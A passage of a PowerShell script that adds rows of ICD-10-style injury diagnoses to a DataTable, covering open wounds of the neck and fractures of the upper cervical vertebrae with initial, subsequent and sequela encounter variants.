$DiagnosisList.Rows.Add("Open bite of pharynx and cervical esophagus","Open bite of pharynx and cervical esophagus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other specified part of neck","Unspecified open wound of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other specified part of neck","Unspecified open wound of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other specified part of neck","Unspecified open wound of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other specified part of neck","Laceration without foreign body of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other specified part of neck","Laceration without foreign body of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other specified part of neck","Laceration without foreign body of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other specified part of neck","Laceration with foreign body of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other specified part of neck","Laceration with foreign body of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other specified part of neck","Laceration with foreign body of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other specified part of neck","Puncture wound without foreign body of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other specified part of neck","Puncture wound without foreign body of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other specified part of neck","Puncture wound without foreign body of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other specified part of neck","Puncture wound with foreign body of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other specified part of neck","Puncture wound with foreign body of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other specified part of neck","Puncture wound with foreign body of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of other specified part of neck","Open bite of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of other specified part of neck","Open bite of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of other specified part of neck","Open bite of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Other open wound of other specified part of neck","Other open wound of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Other open wound of other specified part of neck","Other open wound of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other open wound of other specified part of neck","Other open wound of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified part of neck","Unspecified open wound of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified part of neck","Unspecified open wound of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified part of neck","Unspecified open wound of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified part of neck","Laceration without foreign body of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified part of neck","Laceration without foreign body of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified part of neck","Laceration without foreign body of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified part of neck","Laceration with foreign body of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified part of neck","Laceration with foreign body of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified part of neck","Laceration with foreign body of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified part of neck","Puncture wound without foreign body of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified part of neck","Puncture wound without foreign body of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified part of neck","Puncture wound without foreign body of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified part of neck","Puncture wound with foreign body of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified part of neck","Puncture wound with foreign body of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified part of neck","Puncture wound with foreign body of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified part of neck","Open bite of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified part of neck","Open bite of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified part of neck","Open bite of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of first cervical vertebra","Unspecified displaced fracture of first cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of first cervical vertebra","Unspecified displaced fracture of first cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of first cervical vertebra","Unspecified displaced fracture of first cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of first cervical vertebra","Unspecified displaced fracture of first cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of first cervical vertebra","Unspecified displaced fracture of first cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of first cervical vertebra","Unspecified displaced fracture of first cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of first cervical vertebra","Unspecified nondisplaced fracture of first cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of first cervical vertebra","Unspecified nondisplaced fracture of first cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of first cervical vertebra","Unspecified nondisplaced fracture of first cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of first cervical vertebra","Unspecified nondisplaced fracture of first cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of first cervical vertebra","Unspecified nondisplaced fracture of first cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of first cervical vertebra","Unspecified nondisplaced fracture of first cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first cervical vertebra","Stable burst fracture of first cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first cervical vertebra","Stable burst fracture of first cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first cervical vertebra","Stable burst fracture of first cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first cervical vertebra","Stable burst fracture of first cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first cervical vertebra","Stable burst fracture of first cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first cervical vertebra","Stable burst fracture of first cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first cervical vertebra","Unstable burst fracture of first cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first cervical vertebra","Unstable burst fracture of first cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first cervical vertebra","Unstable burst fracture of first cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first cervical vertebra","Unstable burst fracture of first cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first cervical vertebra","Unstable burst fracture of first cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first cervical vertebra","Unstable burst fracture of first cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Displaced posterior arch fracture of first cervical vertebra","Displaced posterior arch fracture of first cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced posterior arch fracture of first cervical vertebra","Displaced posterior arch fracture of first cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced posterior arch fracture of first cervical vertebra","Displaced posterior arch fracture of first cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced posterior arch fracture of first cervical vertebra","Displaced posterior arch fracture of first cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced posterior arch fracture of first cervical vertebra","Displaced posterior arch fracture of first cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced posterior arch fracture of first cervical vertebra","Displaced posterior arch fracture of first cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced posterior arch fracture of first cervical vertebra","Nondisplaced posterior arch fracture of first cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced posterior arch fracture of first cervical vertebra","Nondisplaced posterior arch fracture of first cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced posterior arch fracture of first cervical vertebra","Nondisplaced posterior arch fracture of first cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced posterior arch fracture of first cervical vertebra","Nondisplaced posterior arch fracture of first cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced posterior arch fracture of first cervical vertebra","Nondisplaced posterior arch fracture of first cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced posterior arch fracture of first cervical vertebra","Nondisplaced posterior arch fracture of first cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Displaced lateral mass fracture of first cervical vertebra","Displaced lateral mass fracture of first cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced lateral mass fracture of first cervical vertebra","Displaced lateral mass fracture of first cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced lateral mass fracture of first cervical vertebra","Displaced lateral mass fracture of first cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced lateral mass fracture of first cervical vertebra","Displaced lateral mass fracture of first cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced lateral mass fracture of first cervical vertebra","Displaced lateral mass fracture of first cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced lateral mass fracture of first cervical vertebra","Displaced lateral mass fracture of first cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced lateral mass fracture of first cervical vertebra","Nondisplaced lateral mass fracture of first cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced lateral mass fracture of first cervical vertebra","Nondisplaced lateral mass fracture of first cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced lateral mass fracture of first cervical vertebra","Nondisplaced lateral mass fracture of first cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced lateral mass fracture of first cervical vertebra","Nondisplaced lateral mass fracture of first cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced lateral mass fracture of first cervical vertebra","Nondisplaced lateral mass fracture of first cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced lateral mass fracture of first cervical vertebra","Nondisplaced lateral mass fracture of first cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of first cervical vertebra","Other displaced fracture of first cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of first cervical vertebra","Other displaced fracture of first cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of first cervical vertebra","Other displaced fracture of first cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of first cervical vertebra","Other displaced fracture of first cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of first cervical vertebra","Other displaced fracture of first cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of first cervical vertebra","Other displaced fracture of first cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of first cervical vertebra","Other nondisplaced fracture of first cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of first cervical vertebra","Other nondisplaced fracture of first cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of first cervical vertebra","Other nondisplaced fracture of first cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of first cervical vertebra","Other nondisplaced fracture of first cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of first cervical vertebra","Other nondisplaced fracture of first cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of first cervical vertebra","Other nondisplaced fracture of first cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of second cervical vertebra","Unspecified displaced fracture of second cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of second cervical vertebra","Unspecified displaced fracture of second cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of second cervical vertebra","Unspecified displaced fracture of second cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of second cervical vertebra","Unspecified displaced fracture of second cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of second cervical vertebra","Unspecified displaced fracture of second cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of second cervical vertebra","Unspecified displaced fracture of second cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of second cervical vertebra","Unspecified nondisplaced fracture of second cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of second cervical vertebra","Unspecified nondisplaced fracture of second cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of second cervical vertebra","Unspecified nondisplaced fracture of second cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of second cervical vertebra","Unspecified nondisplaced fracture of second cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of second cervical vertebra","Unspecified nondisplaced fracture of second cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of second cervical vertebra","Unspecified nondisplaced fracture of second cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Anterior displaced Type II dens fracture","Anterior displaced Type II dens fracture, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Anterior displaced Type II dens fracture","Anterior displaced Type II dens fracture, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Anterior displaced Type II dens fracture","Anterior displaced Type II dens fracture, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Anterior displaced Type II dens fracture","Anterior displaced Type II dens fracture, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Anterior displaced Type II dens fracture","Anterior displaced Type II dens fracture, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Anterior displaced Type II dens fracture","Anterior displaced Type II dens fracture, sequela") + $null = $DiagnosisList.Rows.Add("Posterior displaced Type II dens fracture","Posterior displaced Type II dens fracture, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Posterior displaced Type II dens fracture","Posterior displaced Type II dens fracture, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Posterior displaced Type II dens fracture","Posterior displaced Type II dens fracture, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Posterior displaced Type II dens fracture","Posterior displaced Type II dens fracture, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Posterior displaced Type II dens fracture","Posterior displaced Type II dens fracture, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Posterior displaced Type II dens fracture","Posterior displaced Type II dens fracture, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced Type II dens fracture","Nondisplaced Type II dens fracture, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Type II dens fracture","Nondisplaced Type II dens fracture, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Type II dens fracture","Nondisplaced Type II dens fracture, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Type II dens fracture","Nondisplaced Type II dens fracture, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Type II dens fracture","Nondisplaced Type II dens fracture, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Type II dens fracture","Nondisplaced Type II dens fracture, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced dens fracture","Other displaced dens fracture, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced dens fracture","Other displaced dens fracture, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced dens fracture","Other displaced dens fracture, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced dens fracture","Other displaced dens fracture, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced dens fracture","Other displaced dens fracture, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced dens fracture","Other displaced dens fracture, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced dens fracture","Other nondisplaced dens fracture, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced dens fracture","Other nondisplaced dens fracture, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced dens fracture","Other nondisplaced dens fracture, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced dens fracture","Other nondisplaced dens fracture, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced dens fracture","Other nondisplaced dens fracture, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced dens fracture","Other nondisplaced dens fracture, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of second cervical vertebra","Unspecified traumatic displaced spondylolisthesis of second cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of second cervical vertebra","Unspecified traumatic displaced spondylolisthesis of second cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of second cervical vertebra","Unspecified traumatic displaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of second cervical vertebra","Unspecified traumatic displaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of second cervical vertebra","Unspecified traumatic displaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of second cervical vertebra","Unspecified traumatic displaced spondylolisthesis of second cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra","Unspecified traumatic nondisplaced spondylolisthesis of second cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of second cervical vertebra","Type III traumatic spondylolisthesis of second cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of second cervical vertebra","Type III traumatic spondylolisthesis of second cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of second cervical vertebra","Type III traumatic spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of second cervical vertebra","Type III traumatic spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of second cervical vertebra","Type III traumatic spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Type III traumatic spondylolisthesis of second cervical vertebra","Type III traumatic spondylolisthesis of second cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of second cervical vertebra","Other traumatic displaced spondylolisthesis of second cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of second cervical vertebra","Other traumatic displaced spondylolisthesis of second cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of second cervical vertebra","Other traumatic displaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of second cervical vertebra","Other traumatic displaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of second cervical vertebra","Other traumatic displaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic displaced spondylolisthesis of second cervical vertebra","Other traumatic displaced spondylolisthesis of second cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of second cervical vertebra","Other traumatic nondisplaced spondylolisthesis of second cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of second cervical vertebra","Other traumatic nondisplaced spondylolisthesis of second cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of second cervical vertebra","Other traumatic nondisplaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of second cervical vertebra","Other traumatic nondisplaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of second cervical vertebra","Other traumatic nondisplaced spondylolisthesis of second cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other traumatic nondisplaced spondylolisthesis of second cervical vertebra","Other traumatic nondisplaced spondylolisthesis of second cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of second cervical vertebra","Other displaced fracture of second cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of second cervical vertebra","Other displaced fracture of second cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of second cervical vertebra","Other displaced fracture of second cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of second cervical vertebra","Other displaced fracture of second cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of second cervical vertebra","Other displaced fracture of second cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other displaced fracture of second cervical vertebra","Other displaced fracture of second cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of second cervical vertebra","Other nondisplaced fracture of second cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of second cervical vertebra","Other nondisplaced fracture of second cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of second cervical vertebra","Other nondisplaced fracture of second cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of second cervical vertebra","Other nondisplaced fracture of second cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of second cervical vertebra","Other nondisplaced fracture of second cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other nondisplaced fracture of second cervical vertebra","Other nondisplaced fracture of second cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of third cervical vertebra","Unspecified displaced fracture of third cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of third cervical vertebra","Unspecified displaced fracture of third cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of third cervical vertebra","Unspecified displaced fracture of third cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of third cervical vertebra","Unspecified displaced fracture of third cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of third cervical vertebra","Unspecified displaced fracture of third cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified displaced fracture of third cervical vertebra","Unspecified displaced fracture of third cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of third cervical vertebra","Unspecified nondisplaced fracture of third cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of third cervical vertebra","Unspecified nondisplaced fracture of third cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of third cervical vertebra","Unspecified nondisplaced fracture of third cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of third cervical vertebra","Unspecified nondisplaced fracture of third cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of third cervical vertebra","Unspecified nondisplaced fracture of third cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified nondisplaced fracture of third cervical vertebra","Unspecified nondisplaced fracture of third cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of third cervical vertebra","Unspecified traumatic displaced spondylolisthesis of third cervical vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of third cervical vertebra","Unspecified traumatic displaced spondylolisthesis of third cervical vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of third cervical vertebra","Unspecified traumatic displaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of third cervical vertebra","Unspecified traumatic displaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of third cervical vertebra","Unspecified traumatic displaced spondylolisthesis of third cervical vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic displaced spondylolisthesis of third cervical vertebra","Unspecified traumatic displaced spondylolisthesis of third cervical vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic nondisplaced spondylolisthesis of third cervical vertebra","Unspecified 